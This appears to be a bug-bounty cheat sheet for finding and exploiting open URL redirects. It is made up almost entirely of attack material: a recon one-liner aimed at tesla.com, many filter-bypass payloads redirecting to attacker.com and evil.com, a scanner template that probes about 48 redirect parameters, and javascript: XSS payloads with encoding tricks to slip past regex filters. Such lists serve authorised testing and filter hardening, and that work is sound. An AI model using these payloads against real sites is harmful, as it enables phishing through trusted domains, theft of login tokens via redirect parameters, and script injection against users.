You should be looking for open URL redirects in the following areas of your target:
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
https://evil.com - ❌
https:evil.com ✅
# Bypass a HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com
# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com
# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com
# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company # .company is a valid TLD
https://attacker.com%E3%80%82example.com # URL encoded Chinese dot
attacker%E3%80%82com
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\vicitm.om:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/
/?next=target.com&next=evil.com
Creating folder as victim domain
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
id: mass_48_open_redirect_check
info:
name: Mass 48 Param For Open Redirect
author: SirBugs
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/https://bing.com/"
- "{{BaseURL}}//https://bing.com//"
- "{{BaseURL}}/?targetOrigin=https://bing.com/"
- "{{BaseURL}}/?fallback=https://bing.com/"
- "{{BaseURL}}/?query=https://bing.com/"
- "{{BaseURL}}/?redirection_url=https://bing.com/"
- "{{BaseURL}}/?next=https://bing.com/"
- "{{BaseURL}}/?ref_url=https://bing.com/"
- "{{BaseURL}}/?state=https://bing.com/"
- "{{BaseURL}}/?1=https://bing.com/"
- "{{BaseURL}}/?redirect_uri=https://bing.com/"
- "{{BaseURL}}/?forum_reg=https://bing.com/"
- "{{BaseURL}}/?return_to=https://bing.com/"
- "{{BaseURL}}/?redirect_url=https://bing.com/"
- "{{BaseURL}}/?return_url=https://bing.com/"
- "{{BaseURL}}/?host=https://bing.com/"
- "{{BaseURL}}/?url=https://bing.com/"
- "{{BaseURL}}/?redirectto=https://bing.com/"
- "{{BaseURL}}/?return=https://bing.com/"
- "{{BaseURL}}/?prejoin_data=https://bing.com/"
- "{{BaseURL}}/?callback_url=https://bing.com/"
- "{{BaseURL}}/?path=https://bing.com/"
- "{{BaseURL}}/?authorize_callback=https://bing.com/"
- "{{BaseURL}}/?email=https://bing.com/"
- "{{BaseURL}}/?origin=https://bing.com/"
- "{{BaseURL}}/?continue=https://bing.com/"
- "{{BaseURL}}/?domain_name=https://bing.com/"
- "{{BaseURL}}/?redir=https://bing.com/"
- "{{BaseURL}}/?wp_http_referer=https://bing.com/"
- "{{BaseURL}}/?endpoint=https://bing.com/"
- "{{BaseURL}}/?shop=https://bing.com/"
- "{{BaseURL}}/?qpt_question_url=https://bing.com/"
- "{{BaseURL}}/?checkout_url=https://bing.com/"
- "{{BaseURL}}/?ref_url=https://bing.com/"
- "{{BaseURL}}/?redirect_to=https://bing.com/"
- "{{BaseURL}}/?succUrl=https://bing.com/"
- "{{BaseURL}}/?file=https://bing.com/"
- "{{BaseURL}}/?link=https://bing.com/"
- "{{BaseURL}}/?referrer=https://bing.com/"
- "{{BaseURL}}/?recipient=https://bing.com/"
- "{{BaseURL}}/?redirect=https://bing.com/"
- "{{BaseURL}}/?u=https://bing.com/"
- "{{BaseURL}}/?hostname=https://bing.com/"
- "{{BaseURL}}/?returnTo=https://bing.com/"
- "{{BaseURL}}/?return_path=https://bing.com/"
- "{{BaseURL}}/?image=https://bing.com/"
- "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
- "{{BaseURL}}/?retURL=https://bing.com/"
- "{{BaseURL}}/?next_url=https://bing.com/"
redirects: false
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Location: https://bing.com"
- type: status
status:
- 301
- 302
- 303
- 304
- 307
- 308
GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#
# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)
# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)